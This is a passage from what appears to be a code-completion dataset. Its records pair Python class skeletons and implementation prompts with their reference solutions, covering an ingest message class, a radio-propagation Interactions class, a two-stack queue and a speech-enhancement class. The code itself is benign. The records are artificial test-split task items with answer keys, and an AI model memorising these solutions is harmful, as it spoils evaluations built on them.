None\n self.strike_id = None\n\n def to_json(self):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.to_json`\"\"\"\n json_dict = {'create_ingest_type': self.create_ingest_type, 'ingest_id': self.ingest_id}\n if self.create_ingest_type == STRIKE_JOB_TYPE:\n json_dict['strike_id'] = self.strike_id\n elif self.create_ingest_type == SCAN_JOB_TYPE:\n json_dict['scan_id'] = self.scan_id\n return json_dict\n\n def from_json(json_dict):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.from_json`\"\"\"\n message = CreateIngest()\n message.create_ingest_type = json_dict['create_ingest_type']\n message.ingest_id = json_dict['ingest_id']\n if message.create_ingest_type == STRIKE_JOB_TYPE:\n message.strike_id = json_dict['strike_id']\n elif message.create_ingest_type == SCAN_JOB_TYPE:\n message.scan_id = json_dict['scan_id']\n return message\n\n def execute(self):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.execute`\"\"\"\n from ingest.models import Ingest\n ingest_job_type = Ingest.objects.get_ingest_job_type()\n ingest = Ingest.objects.get(pk=self.ingest_id)\n when = ingest.transfer_ended if ingest.transfer_ended else now()\n desc = {'file_name': ingest.file_name}\n event = None\n ingest_id = ingest.id\n with transaction.atomic():\n if self.create_ingest_type == STRIKE_JOB_TYPE:\n desc['strike_id'] = self.strike_id\n event = TriggerEvent.objects.create_trigger_event('STRIKE_TRANSFER', None, desc, when)\n elif self.create_ingest_type == SCAN_JOB_TYPE:\n ingest_id = Ingest.objects.get(scan_id=self.scan_id, file_name=ingest.file_name).id\n desc['scan_id'] = self.scan_id\n event = TriggerEvent.objects.create_trigger_event('SCAN_TRANSFER', None, desc, when)\n data = Data()\n data.add_value(JsonValue('ingest_id', ingest_id))\n data.add_value(JsonValue('workspace', ingest.workspace.name))\n if ingest.new_workspace:\n data.add_value(JsonValue('new_workspace', ingest.new_workspace.name))\n ingest_job = None\n with transaction.atomic():\n ingest_job = Queue.objects.queue_new_job_v6(ingest_job_type, data, event)\n ingest.job = ingest_job\n ingest.status = 'QUEUED'\n ingest.save()\n job = Job.objects.get_details(ingest_job.id)\n self.new_messages.extend(create_process_job_input_messages([job.id]))\n return True\n", "source": "the_stack_v2_python_sparse", "source_path": "scale/ingest/messages/create_ingest_jobs.py", "source_repo": "kfconsultant/scale", "split": "test", "star_events_count": 0} {"blob_id": "3aedabadd9652e25b37713f09f9db2f95aab1c83", "bodies": ["Inter.__init__(self, slab=slab)\nself['B'] = []\nself['L'] = []\nself[''] = []\nself['T'] = []\nself['D'] = []\nself.evaluated = False\nself.nimax = 0", "for i in li:\n if i.idx != []:\n self.nimax = max(self.nimax, max(i.idx)) + 1\nfor i in li:\n self.addi(i)", "if not isinstance(self.typ, np.ndarray):\n self.typ = np.zeros(self.nimax, dtype=str)\nif i.typ == -1:\n self.B = i\n self['B'] = i.idx\n self.typ[i.idx] = 'B'\nif i.typ == 0:\n self.L = i\n self['L'] = i.idx\n self.typ[i.idx] = 'L'\nif i.typ == 1:\n self.D = i\n self['D'] = i.idx\n self.typ[i.idx] = 'D'\nif i.typ == 2:\n self.R = i\n self['R'] = i.idx\n self.typ[i.idx] = 'R'\nif i.typ == 3:\n self.T = i\n self['T'] = i.idx\n self.typ[i.idx] = 'T'", "self.fGHz = fGHz\nself.nf = len(fGHz)\nself.I = np.zeros((self.nf, self.nimax, 3, 3), dtype=complex)\nself.sout = np.zeros(self.nimax)\nself.si0 = np.zeros(self.nimax)\nself.alpha = np.ones(self.nimax, dtype=complex)\nself.gamma = np.ones(self.nimax, dtype=complex)\nif len(self.R.data) != 0:\n self.I[:, self.R.idx, :, :] = self.R.eval(fGHz=fGHz)\n self.sout[self.R.idx] = self.R.sout\n self.si0[self.R.idx] = self.R.si0\n self.alpha[self.R.idx] = self.R.alpha\n self.gamma[self.R.idx] = self.R.gamma\nif len(self.T.data) != 0:\n self.I[:, self.T.idx, :, :] = self.T.eval(fGHz=fGHz)\n self.sout[self.T.idx] = self.T.sout\n self.si0[self.T.idx] = self.T.si0\n self.alpha[self.T.idx] = self.T.alpha\n self.gamma[self.T.idx] = self.T.gamma\nif len(self.D.data) != 0:\n self.I[:, self.D.idx, :, :] = self.D.eval(fGHz=fGHz)\n self.sout[self.D.idx] = self.D.sout\n self.si0[self.D.idx] = self.D.si0\nself.evaluated = True"], "bodies_text": "<|body_start_0|>\n Inter.__init__(self, slab=slab)\n self['B'] = []\n self['L'] = []\n self[''] = []\n self['T'] = []\n self['D'] = []\n self.evaluated = False\n self.nimax = 0\n<|end_body_0|>\n\n<|body_start_1|>\n for i in li:\n if i.idx != []:\n self.nimax = max(self.nimax, max(i.idx)) + 1\n for i in li:\n self.addi(i)\n<|end_body_1|>\n\n<|body_start_2|>\n if not isinstance(self.typ, np.ndarray):\n self.typ = np.zeros(self.nimax, dtype=str)\n if i.typ == -1:\n self.B = i\n self['B'] = i.idx\n self.typ[i.idx] = 'B'\n if i.typ == 0:\n self.L = i\n self['L'] = i.idx\n self.typ[i.idx] = 'L'\n if i.typ == 1:\n self.D = i\n self['D'] = i.idx\n self.typ[i.idx] = 'D'\n if i.typ == 2:\n self.R = i\n self['R'] = i.idx\n self.typ[i.idx] = 'R'\n if i.typ == 3:\n self.T = i\n self['T'] = i.idx\n self.typ[i.idx] = 'T'\n<|end_body_2|>\n\n<|body_start_3|>\n self.fGHz = fGHz\n self.nf = len(fGHz)\n self.I = np.zeros((self.nf, self.nimax, 3, 3), dtype=complex)\n self.sout = np.zeros(self.nimax)\n self.si0 = np.zeros(self.nimax)\n self.alpha = np.ones(self.nimax, dtype=complex)\n self.gamma = np.ones(self.nimax, dtype=complex)\n if len(self.R.data) != 0:\n self.I[:, self.R.idx, :, :] = self.R.eval(fGHz=fGHz)\n self.sout[self.R.idx] = self.R.sout\n self.si0[self.R.idx] = self.R.si0\n self.alpha[self.R.idx] = self.R.alpha\n self.gamma[self.R.idx] = self.R.gamma\n if len(self.T.data) != 0:\n self.I[:, self.T.idx, :, :] = self.T.eval(fGHz=fGHz)\n self.sout[self.T.idx] = self.T.sout\n self.si0[self.T.idx] = self.T.si0\n self.alpha[self.T.idx] = self.T.alpha\n self.gamma[self.T.idx] = self.T.gamma\n if len(self.D.data) != 0:\n self.I[:, self.D.idx, :, :] = self.D.eval(fGHz=fGHz)\n self.sout[self.D.idx] = self.D.sout\n self.si0[self.D.idx] = self.D.si0\n self.evaluated = True\n<|end_body_3|>\n", "class_docstring": "Interaction parameters gather all type of interactions (IntB/L/R/T) Methods ------- add(self,li): add a list of basis interactions addi(self,i): add a single interaction eval(self) : evaluate all the interactions added thanks to self.add or self.addi and create the self.I which gather all thoses interactions 5 following types of interactions B : local basis transformation matrix (unitary) L : LOS case R : Reflection T : Transmission D : Diffraction", "class_name": "Interactions", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Interactions:\n \"\"\"Interaction parameters gather all type of interactions (IntB/L/R/T) Methods ------- add(self,li): add a list of basis interactions addi(self,i): add a single interaction eval(self) : evaluate all the interactions added thanks to self.add or self.addi and create the self.I which gather all thoses interactions 5 following types of interactions B : local basis transformation matrix (unitary) L : LOS case R : Reflection T : Transmission D : Diffraction\"\"\"\n\n def __init__(self, slab={}):\n \"\"\"object constructor\"\"\"\n <|body_0|>\n\n def add(self, li):\n \"\"\"add a list of interactions Parameters ---------- li : list list of interactions\"\"\"\n <|body_1|>\n\n def addi(self, i):\n \"\"\"add interactions into Interactions class Parameters ---------- i : Inter object\"\"\"\n <|body_2|>\n\n def eval(self, fGHz=np.array([2.4])):\n \"\"\"evaluate all the interactions Parameters ---------- fGHz : np.array() Notes ----- self.I : np.shape(self.I) = (self.nf,self.nimax,2,2) with self.nf : number of frequences self.nimax : the total number of interactions ( of all rays) self.sout : distance from one interaction to the next one self.si0 : distance from the previous interaction to the one self.alpha : alpha as described in JFL Thesis self.gamma : !! gamma**2 !!! (squared included) as described\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n Inter.__init__(self, slab=slab)\n self['B'] = []\n self['L'] = []\n self[''] = []\n self['T'] = []\n self['D'] = []\n self.evaluated = False\n self.nimax = 0\n<|end_body_0|>\n\n<|body_start_1|>\n for i in li:\n if i.idx != []:\n self.nimax = max(self.nimax, max(i.idx)) + 1\n for i in li:\n self.addi(i)\n<|end_body_1|>\n\n<|body_start_2|>\n if not isinstance(self.typ, np.ndarray):\n self.typ = np.zeros(self.nimax, dtype=str)\n if i.typ == -1:\n self.B = i\n self['B'] = i.idx\n self.typ[i.idx] = 'B'\n if i.typ == 0:\n self.L = i\n self['L'] = i.idx\n self.typ[i.idx] = 'L'\n if i.typ == 1:\n self.D = i\n self['D'] = i.idx\n self.typ[i.idx] = 'D'\n if i.typ == 2:\n self.R = i\n self['R'] = i.idx\n self.typ[i.idx] = 'R'\n if i.typ == 3:\n self.T = i\n self['T'] = i.idx\n self.typ[i.idx] = 'T'\n<|end_body_2|>\n\n<|body_start_3|>\n self.fGHz = fGHz\n self.nf = len(fGHz)\n self.I = np.zeros((self.nf, self.nimax, 3, 3), dtype=complex)\n self.sout = np.zeros(self.nimax)\n self.si0 = np.zeros(self.nimax)\n self.alpha = np.ones(self.nimax, dtype=complex)\n self.gamma = np.ones(self.nimax, dtype=complex)\n if len(self.R.data) != 0:\n self.I[:, self.R.idx, :, :] = self.R.eval(fGHz=fGHz)\n self.sout[self.R.idx] = self.R.sout\n self.si0[self.R.idx] = self.R.si0\n self.alpha[self.R.idx] = self.R.alpha\n self.gamma[self.R.idx] = self.R.gamma\n if len(self.T.data) != 0:\n self.I[:, self.T.idx, :, :] = self.T.eval(fGHz=fGHz)\n self.sout[self.T.idx] = self.T.sout\n self.si0[self.T.idx] = self.T.si0\n self.alpha[self.T.idx] = self.T.alpha\n self.gamma[self.T.idx] = self.T.gamma\n if len(self.D.data) != 0:\n self.I[:, self.D.idx, :, :] = self.D.eval(fGHz=fGHz)\n self.sout[self.D.idx] = self.D.sout\n self.si0[self.D.idx] = self.D.si0\n self.evaluated = True\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000294", "length_bytes": 25448, "license_type": "permissive", "methods": [{"docstring": "object constructor", "name": "__init__", "signature": "def __init__(self, slab={})"}, {"docstring": "add a list of interactions Parameters ---------- li : list list of interactions", "name": "add", "signature": "def add(self, li)"}, {"docstring": "add interactions into Interactions class Parameters ---------- i : Inter object", "name": "addi", "signature": "def addi(self, i)"}, {"docstring": "evaluate all the interactions Parameters ---------- fGHz : np.array() Notes ----- self.I : np.shape(self.I) = (self.nf,self.nimax,2,2) with self.nf : number of frequences self.nimax : the total number of interactions ( of all rays) self.sout : distance from one interaction to the next one self.si0 : distance from the previous interaction to the one self.alpha : alpha as described in JFL Thesis self.gamma : !! gamma**2 !!! (squared included) as described", "name": "eval", "signature": "def eval(self, fGHz=np.array([2.4]))"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_003862", "prompt": "Implement the Python class `Interactions` described below.\n\nClass description:\nInteraction parameters gather all type of interactions (IntB/L/R/T) Methods ------- add(self,li): add a list of basis interactions addi(self,i): add a single interaction eval(self) : evaluate all the interactions added thanks to self.add or self.addi and create the self.I which gather all thoses interactions 5 following types of interactions B : local basis transformation matrix (unitary) L : LOS case R : Reflection T : Transmission D : Diffraction\n\nMethod signatures and docstrings:\n- def __init__(self, slab={}): object constructor\n- def add(self, li): add a list of interactions Parameters ---------- li : list list of interactions\n- def addi(self, i): add interactions into Interactions class Parameters ---------- i : Inter object\n- def eval(self, fGHz=np.array([2.4])): evaluate all the interactions Parameters ---------- fGHz : np.array() Notes ----- self.I : np.shape(self.I) = (self.nf,self.nimax,2,2) with self.nf : number of frequences self.nimax : the total number of interactions ( of all rays) self.sout : distance from one interaction to the next one self.si0 : distance from the previous interaction to the one self.alpha : alpha as described in JFL Thesis self.gamma : !! gamma**2 !!! (squared included) as described", "prompted_full_text": "Implement the Python class `Interactions` described below.\n\nClass description:\nInteraction parameters gather all type of interactions (IntB/L/R/T) Methods ------- add(self,li): add a list of basis interactions addi(self,i): add a single interaction eval(self) : evaluate all the interactions added thanks to self.add or self.addi and create the self.I which gather all thoses interactions 5 following types of interactions B : local basis transformation matrix (unitary) L : LOS case R : Reflection T : Transmission D : Diffraction\n\nMethod signatures and docstrings:\n- def __init__(self, slab={}): object constructor\n- def add(self, li): add a list of interactions Parameters ---------- li : list list of interactions\n- def addi(self, i): add interactions into Interactions class Parameters ---------- i : Inter object\n- def eval(self, fGHz=np.array([2.4])): evaluate all the interactions Parameters ---------- fGHz : np.array() Notes ----- self.I : np.shape(self.I) = (self.nf,self.nimax,2,2) with self.nf : number of frequences self.nimax : the total number of interactions ( of all rays) self.sout : distance from one interaction to the next one self.si0 : distance from the previous interaction to the one self.alpha : alpha as described in JFL Thesis self.gamma : !! gamma**2 !!! (squared included) as described\n\n<|skeleton|>\nclass Interactions:\n \"\"\"Interaction parameters gather all type of interactions (IntB/L/R/T) Methods ------- add(self,li): add a list of basis interactions addi(self,i): add a single interaction eval(self) : evaluate all the interactions added thanks to self.add or self.addi and create the self.I which gather all thoses interactions 5 following types of interactions B : local basis transformation matrix (unitary) L : LOS case R : Reflection T : Transmission D : Diffraction\"\"\"\n\n def __init__(self, slab={}):\n \"\"\"object constructor\"\"\"\n <|body_0|>\n\n def add(self, li):\n \"\"\"add a list of interactions Parameters ---------- li : list list of interactions\"\"\"\n <|body_1|>\n\n def addi(self, i):\n \"\"\"add interactions into Interactions class Parameters ---------- i : Inter object\"\"\"\n <|body_2|>\n\n def eval(self, fGHz=np.array([2.4])):\n \"\"\"evaluate all the interactions Parameters ---------- fGHz : np.array() Notes ----- self.I : np.shape(self.I) = (self.nf,self.nimax,2,2) with self.nf : number of frequences self.nimax : the total number of interactions ( of all rays) self.sout : distance from one interaction to the next one self.si0 : distance from the previous interaction to the one self.alpha : alpha as described in JFL Thesis self.gamma : !! gamma**2 !!! (squared included) as described\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n Inter.__init__(self, slab=slab)\n self['B'] = []\n self['L'] = []\n self[''] = []\n self['T'] = []\n self['D'] = []\n self.evaluated = False\n self.nimax = 0\n<|end_body_0|>\n\n<|body_start_1|>\n for i in li:\n if i.idx != []:\n self.nimax = max(self.nimax, max(i.idx)) + 1\n for i in li:\n self.addi(i)\n<|end_body_1|>\n\n<|body_start_2|>\n if not isinstance(self.typ, np.ndarray):\n self.typ = np.zeros(self.nimax, dtype=str)\n if i.typ == -1:\n self.B = i\n self['B'] = i.idx\n self.typ[i.idx] = 'B'\n if i.typ == 0:\n self.L = i\n self['L'] = i.idx\n self.typ[i.idx] = 'L'\n if i.typ == 1:\n self.D = i\n self['D'] = i.idx\n self.typ[i.idx] = 'D'\n if i.typ == 2:\n self.R = i\n self['R'] = i.idx\n self.typ[i.idx] = 'R'\n if i.typ == 3:\n self.T = i\n self['T'] = i.idx\n self.typ[i.idx] = 'T'\n<|end_body_2|>\n\n<|body_start_3|>\n self.fGHz = fGHz\n self.nf = len(fGHz)\n self.I = np.zeros((self.nf, self.nimax, 3, 3), dtype=complex)\n self.sout = np.zeros(self.nimax)\n self.si0 = np.zeros(self.nimax)\n self.alpha = np.ones(self.nimax, dtype=complex)\n self.gamma = np.ones(self.nimax, dtype=complex)\n if len(self.R.data) != 0:\n self.I[:, self.R.idx, :, :] = self.R.eval(fGHz=fGHz)\n self.sout[self.R.idx] = self.R.sout\n self.si0[self.R.idx] = self.R.si0\n self.alpha[self.R.idx] = self.R.alpha\n self.gamma[self.R.idx] = self.R.gamma\n if len(self.T.data) != 0:\n self.I[:, self.T.idx, :, :] = self.T.eval(fGHz=fGHz)\n self.sout[self.T.idx] = self.T.sout\n self.si0[self.T.idx] = self.T.si0\n self.alpha[self.T.idx] = self.T.alpha\n self.gamma[self.T.idx] = self.T.gamma\n if len(self.D.data) != 0:\n self.I[:, self.D.idx, :, :] = self.D.eval(fGHz=fGHz)\n self.sout[self.D.idx] = self.D.sout\n self.si0[self.D.idx] = self.D.si0\n self.evaluated = True\n<|end_body_3|>\n", "revision_id": "a3a5973a0cb549d0a16f17b96a9c78c200cf0c7e", "skeleton": "<|skeleton|>\nclass Interactions:\n \"\"\"Interaction parameters gather all type of interactions (IntB/L/R/T) Methods ------- add(self,li): add a list of basis interactions addi(self,i): add a single interaction eval(self) : evaluate all the interactions added thanks to self.add or self.addi and create the self.I which gather all thoses interactions 5 following types of interactions B : local basis transformation matrix (unitary) L : LOS case R : Reflection T : Transmission D : Diffraction\"\"\"\n\n def __init__(self, slab={}):\n \"\"\"object constructor\"\"\"\n <|body_0|>\n\n def add(self, li):\n \"\"\"add a list of interactions Parameters ---------- li : list list of interactions\"\"\"\n <|body_1|>\n\n def addi(self, i):\n \"\"\"add interactions into Interactions class Parameters ---------- i : Inter object\"\"\"\n <|body_2|>\n\n def eval(self, fGHz=np.array([2.4])):\n \"\"\"evaluate all the interactions Parameters ---------- fGHz : np.array() Notes ----- self.I : np.shape(self.I) = (self.nf,self.nimax,2,2) with self.nf : number of frequences self.nimax : the total number of interactions ( of all rays) self.sout : distance from one interaction to the next one self.si0 : distance from the previous interaction to the one self.alpha : alpha as described in JFL Thesis self.gamma : !! gamma**2 !!! (squared included) as described\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Interactions:\n \"\"\"Interaction parameters gather all type of interactions (IntB/L/R/T) Methods ------- add(self,li): add a list of basis interactions addi(self,i): add a single interaction eval(self) : evaluate all the interactions added thanks to self.add or self.addi and create the self.I which gather all thoses interactions 5 following types of interactions B : local basis transformation matrix (unitary) L : LOS case R : Reflection T : Transmission D : Diffraction\"\"\"\n\n def __init__(self, slab={}):\n \"\"\"object constructor\"\"\"\n Inter.__init__(self, slab=slab)\n self['B'] = []\n self['L'] = []\n self[''] = []\n self['T'] = []\n self['D'] = []\n self.evaluated = False\n self.nimax = 0\n\n def add(self, li):\n \"\"\"add a list of interactions Parameters ---------- li : list list of interactions\"\"\"\n for i in li:\n if i.idx != []:\n self.nimax = max(self.nimax, max(i.idx)) + 1\n for i in li:\n self.addi(i)\n\n def addi(self, i):\n \"\"\"add interactions into Interactions class Parameters ---------- i : Inter object\"\"\"\n if not isinstance(self.typ, np.ndarray):\n self.typ = np.zeros(self.nimax, dtype=str)\n if i.typ == -1:\n self.B = i\n self['B'] = i.idx\n self.typ[i.idx] = 'B'\n if i.typ == 0:\n self.L = i\n self['L'] = i.idx\n self.typ[i.idx] = 'L'\n if i.typ == 1:\n self.D = i\n self['D'] = i.idx\n self.typ[i.idx] = 'D'\n if i.typ == 2:\n self.R = i\n self['R'] = i.idx\n self.typ[i.idx] = 'R'\n if i.typ == 3:\n self.T = i\n self['T'] = i.idx\n self.typ[i.idx] = 'T'\n\n def eval(self, fGHz=np.array([2.4])):\n \"\"\"evaluate all the interactions Parameters ---------- fGHz : np.array() Notes ----- self.I : np.shape(self.I) = (self.nf,self.nimax,2,2) with self.nf : number of frequences self.nimax : the total number of interactions ( of all rays) self.sout : distance from one interaction to the next one self.si0 : distance from the previous interaction to the one self.alpha : alpha as described in JFL Thesis self.gamma : !! gamma**2 !!! (squared included) as described\"\"\"\n self.fGHz = fGHz\n self.nf = len(fGHz)\n self.I = np.zeros((self.nf, self.nimax, 3, 3), dtype=complex)\n self.sout = np.zeros(self.nimax)\n self.si0 = np.zeros(self.nimax)\n self.alpha = np.ones(self.nimax, dtype=complex)\n self.gamma = np.ones(self.nimax, dtype=complex)\n if len(self.R.data) != 0:\n self.I[:, self.R.idx, :, :] = self.R.eval(fGHz=fGHz)\n self.sout[self.R.idx] = self.R.sout\n self.si0[self.R.idx] = self.R.si0\n self.alpha[self.R.idx] = self.R.alpha\n self.gamma[self.R.idx] = self.R.gamma\n if len(self.T.data) != 0:\n self.I[:, self.T.idx, :, :] = self.T.eval(fGHz=fGHz)\n self.sout[self.T.idx] = self.T.sout\n self.si0[self.T.idx] = self.T.si0\n self.alpha[self.T.idx] = self.T.alpha\n self.gamma[self.T.idx] = self.T.gamma\n if len(self.D.data) != 0:\n self.I[:, self.D.idx, :, :] = self.D.eval(fGHz=fGHz)\n self.sout[self.D.idx] = self.D.sout\n self.si0[self.D.idx] = self.D.si0\n self.evaluated = True\n", "source": "the_stack_v2_python_sparse", "source_path": "pylayers/antprop/interactions.py", "source_repo": "sahibdhanjal/DeepLocNet", "split": "test", "star_events_count": 40} {"blob_id": "f87425751fa98f2c33671d5fa3caa80064e6460f", "bodies": ["self.s1 = []\nself.s2 = []\nself.front = None", "if not self.s1:\n self.front = x\nself.s1.append(x)", "if not self.s2:\n while self.s1:\n self.s2.append(self.s1.pop())\nreturn self.s2.pop()", "if self.s2:\n return self.s2[-1]\nreturn self.front", "if not self.s1 and (not self.s2):\n return True\nreturn False"], "bodies_text": "<|body_start_0|>\n self.s1 = []\n self.s2 = []\n self.front = None\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.s1:\n self.front = x\n self.s1.append(x)\n<|end_body_1|>\n\n<|body_start_2|>\n if not self.s2:\n while self.s1:\n self.s2.append(self.s1.pop())\n return self.s2.pop()\n<|end_body_2|>\n\n<|body_start_3|>\n if self.s2:\n return self.s2[-1]\n return self.front\n<|end_body_3|>\n\n<|body_start_4|>\n if not self.s1 and (not self.s2):\n return True\n return False\n<|end_body_4|>\n", "class_docstring": "", "class_name": "MyQueue", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MyQueue:\n\n def __init__(self):\n \"\"\"Initialize your data structure here.\"\"\"\n <|body_0|>\n\n def push(self, x: int) -> None:\n \"\"\"Push element x to the back of queue.\"\"\"\n <|body_1|>\n\n def pop(self) -> int:\n \"\"\"Removes the element from in front of queue and returns that element.\"\"\"\n <|body_2|>\n\n def peek(self) -> int:\n \"\"\"Get the front element.\"\"\"\n <|body_3|>\n\n def empty(self) -> bool:\n \"\"\"Returns whether the queue is empty.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.s1 = []\n self.s2 = []\n self.front = None\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.s1:\n self.front = x\n self.s1.append(x)\n<|end_body_1|>\n\n<|body_start_2|>\n if not self.s2:\n while self.s1:\n self.s2.append(self.s1.pop())\n return self.s2.pop()\n<|end_body_2|>\n\n<|body_start_3|>\n if self.s2:\n return self.s2[-1]\n return self.front\n<|end_body_3|>\n\n<|body_start_4|>\n if not self.s1 and (not self.s2):\n return True\n return False\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000295", "length_bytes": 3995, "license_type": "no_license", "methods": [{"docstring": "Initialize your data structure here.", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Push element x to the back of queue.", "name": "push", "signature": "def push(self, x: int) -> None"}, {"docstring": "Removes the element from in front of queue and returns that element.", "name": "pop", "signature": "def pop(self) -> int"}, {"docstring": "Get the front element.", "name": "peek", "signature": "def peek(self) -> int"}, {"docstring": "Returns whether the queue is empty.", "name": "empty", "signature": "def empty(self) -> bool"}], "n_methods": 5, "prompt": "Implement the Python class `MyQueue` described below.\n\nClass description:\nImplement the MyQueue class.\n\nMethod signatures and docstrings:\n- def __init__(self): Initialize your data structure here.\n- def push(self, x: int) -> None: Push element x to the back of queue.\n- def pop(self) -> int: Removes the element from in front of queue and returns that element.\n- def peek(self) -> int: Get the front element.\n- def empty(self) -> bool: Returns whether the queue is empty.", "prompted_full_text": "Implement the Python class `MyQueue` described below.\n\nClass description:\nImplement the MyQueue class.\n\nMethod signatures and docstrings:\n- def __init__(self): Initialize your data structure here.\n- def push(self, x: int) -> None: Push element x to the back of queue.\n- def pop(self) -> int: Removes the element from in front of queue and returns that element.\n- def peek(self) -> int: Get the front element.\n- def empty(self) -> bool: Returns whether the queue is empty.\n\n<|skeleton|>\nclass MyQueue:\n\n def __init__(self):\n \"\"\"Initialize your data structure here.\"\"\"\n <|body_0|>\n\n def push(self, x: int) -> None:\n \"\"\"Push element x to the back of queue.\"\"\"\n <|body_1|>\n\n def pop(self) -> int:\n \"\"\"Removes the element from in front of queue and returns that element.\"\"\"\n <|body_2|>\n\n def peek(self) -> int:\n \"\"\"Get the front element.\"\"\"\n <|body_3|>\n\n def empty(self) -> bool:\n \"\"\"Returns whether the queue is empty.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.s1 = []\n self.s2 = []\n self.front = None\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.s1:\n self.front = x\n self.s1.append(x)\n<|end_body_1|>\n\n<|body_start_2|>\n if not self.s2:\n while self.s1:\n self.s2.append(self.s1.pop())\n return self.s2.pop()\n<|end_body_2|>\n\n<|body_start_3|>\n if self.s2:\n return self.s2[-1]\n return self.front\n<|end_body_3|>\n\n<|body_start_4|>\n if not self.s1 and (not self.s2):\n return True\n return False\n<|end_body_4|>\n", "revision_id": "2e68822e82df37e8347a7c16616a0a99a8075c3f", "skeleton": "<|skeleton|>\nclass MyQueue:\n\n def __init__(self):\n \"\"\"Initialize your data structure here.\"\"\"\n <|body_0|>\n\n def push(self, x: int) -> None:\n \"\"\"Push element x to the back of queue.\"\"\"\n <|body_1|>\n\n def pop(self) -> int:\n \"\"\"Removes the element from in front of queue and returns that element.\"\"\"\n <|body_2|>\n\n def peek(self) -> int:\n \"\"\"Get the front element.\"\"\"\n <|body_3|>\n\n def empty(self) -> bool:\n \"\"\"Returns whether the queue is empty.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MyQueue:\n def __init__(self):\n \"\"\"Initialize your data structure here.\"\"\"\n self.s1 = []\n self.s2 = []\n self.front = None\n\n def push(self, x: int) -> None:\n \"\"\"Push element x to the back of queue.\"\"\"\n if not self.s1:\n self.front = x\n self.s1.append(x)\n\n def pop(self) -> int:\n \"\"\"Removes the element from in front of queue and returns that element.\"\"\"\n if not self.s2:\n while self.s1:\n self.s2.append(self.s1.pop())\n return self.s2.pop()\n\n def peek(self) -> int:\n \"\"\"Get the front element.\"\"\"\n if self.s2:\n return self.s2[-1]\n return self.front\n\n def empty(self) -> bool:\n \"\"\"Returns whether the queue is empty.\"\"\"\n if not self.s1 and (not self.s2):\n return True\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "leet_code/232. 用栈实现队列.py", "source_repo": "muyisanshuiliang/python", "split": "test", "star_events_count": 0} {"blob_id": "0c1b699d18933ca76dcc0358803abd2a50a8c082", "bodies": ["feats = self.hparams.compute_stft(wavs)\nfeats = self.hparams.spectral_magnitude(feats)\nreturn torch.log1p(feats)", "noisy = noisy.to(self.device)\nnoisy_features = self.compute_features(noisy)\nif lengths is not None:\n mask = self.modules.enhance_model(noisy_features, lengths=lengths)\nelse:\n mask = self.modules.enhance_model(noisy_features)\nenhanced = torch.mul(mask, noisy_features)\nreturn self.hparams.resynth(torch.expm1(enhanced), noisy)", "noisy = self.load_audio(filename)\nnoisy = noisy.to(self.device)\nbatch = noisy.unsqueeze(0)\nenhanced = self.enhance_batch(batch)\nif output_filename is not None:\n torchaudio.save(output_filename, enhanced, channels_first=False)\nreturn enhanced.squeeze(0)"], "bodies_text": "<|body_start_0|>\n feats = self.hparams.compute_stft(wavs)\n feats = self.hparams.spectral_magnitude(feats)\n return torch.log1p(feats)\n<|end_body_0|>\n\n<|body_start_1|>\n noisy = noisy.to(self.device)\n noisy_features = self.compute_features(noisy)\n if lengths is not None:\n mask = self.modules.enhance_model(noisy_features, lengths=lengths)\n else:\n mask = self.modules.enhance_model(noisy_features)\n enhanced = torch.mul(mask, noisy_features)\n return self.hparams.resynth(torch.expm1(enhanced), noisy)\n<|end_body_1|>\n\n<|body_start_2|>\n noisy = self.load_audio(filename)\n noisy = noisy.to(self.device)\n batch = noisy.unsqueeze(0)\n enhanced = self.enhance_batch(batch)\n if output_filename is not None:\n torchaudio.save(output_filename, enhanced, channels_first=False)\n return enhanced.squeeze(0)\n<|end_body_2|>\n", "class_docstring": "A ready-to-use model for speech enhancement. Arguments --------- See ``Pretrained``. Example ------- >>> import torchaudio >>> from speechbrain.pretrained import SpectralMaskEnhancement >>> # Model is downloaded from the speechbrain HuggingFace repo >>> tmpdir = getfixture(\"tmpdir\") >>> enhancer = SpectralMaskEnhancement.from_hparams( ... source=\"speechbrain/mtl-mimic-voicebank\", ... savedir=tmpdir, ... ) >>> noisy, fs = torchaudio.load(\"samples/audio_samples/example_noisy.wav\") >>> # Channel dimension is interpreted as batch dimension here >>> enhanced = enhancer.enhance_batch(noisy)", "class_name": "SpectralMaskEnhancement", "detected_licenses": ["Apache-2.0", "BSD-2-Clause", "MIT", "BSD-3-Clause", "LicenseRef-scancode-generic-cla", "LicenseRef-scancode-unknown-license-reference", "GPL-1.0-or-later"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SpectralMaskEnhancement:\n \"\"\"A ready-to-use model for speech enhancement. Arguments --------- See ``Pretrained``. Example ------- >>> import torchaudio >>> from speechbrain.pretrained import SpectralMaskEnhancement >>> # Model is downloaded from the speechbrain HuggingFace repo >>> tmpdir = getfixture(\"tmpdir\") >>> enhancer = SpectralMaskEnhancement.from_hparams( ... source=\"speechbrain/mtl-mimic-voicebank\", ... savedir=tmpdir, ... ) >>> noisy, fs = torchaudio.load(\"samples/audio_samples/example_noisy.wav\") >>> # Channel dimension is interpreted as batch dimension here >>> enhanced = 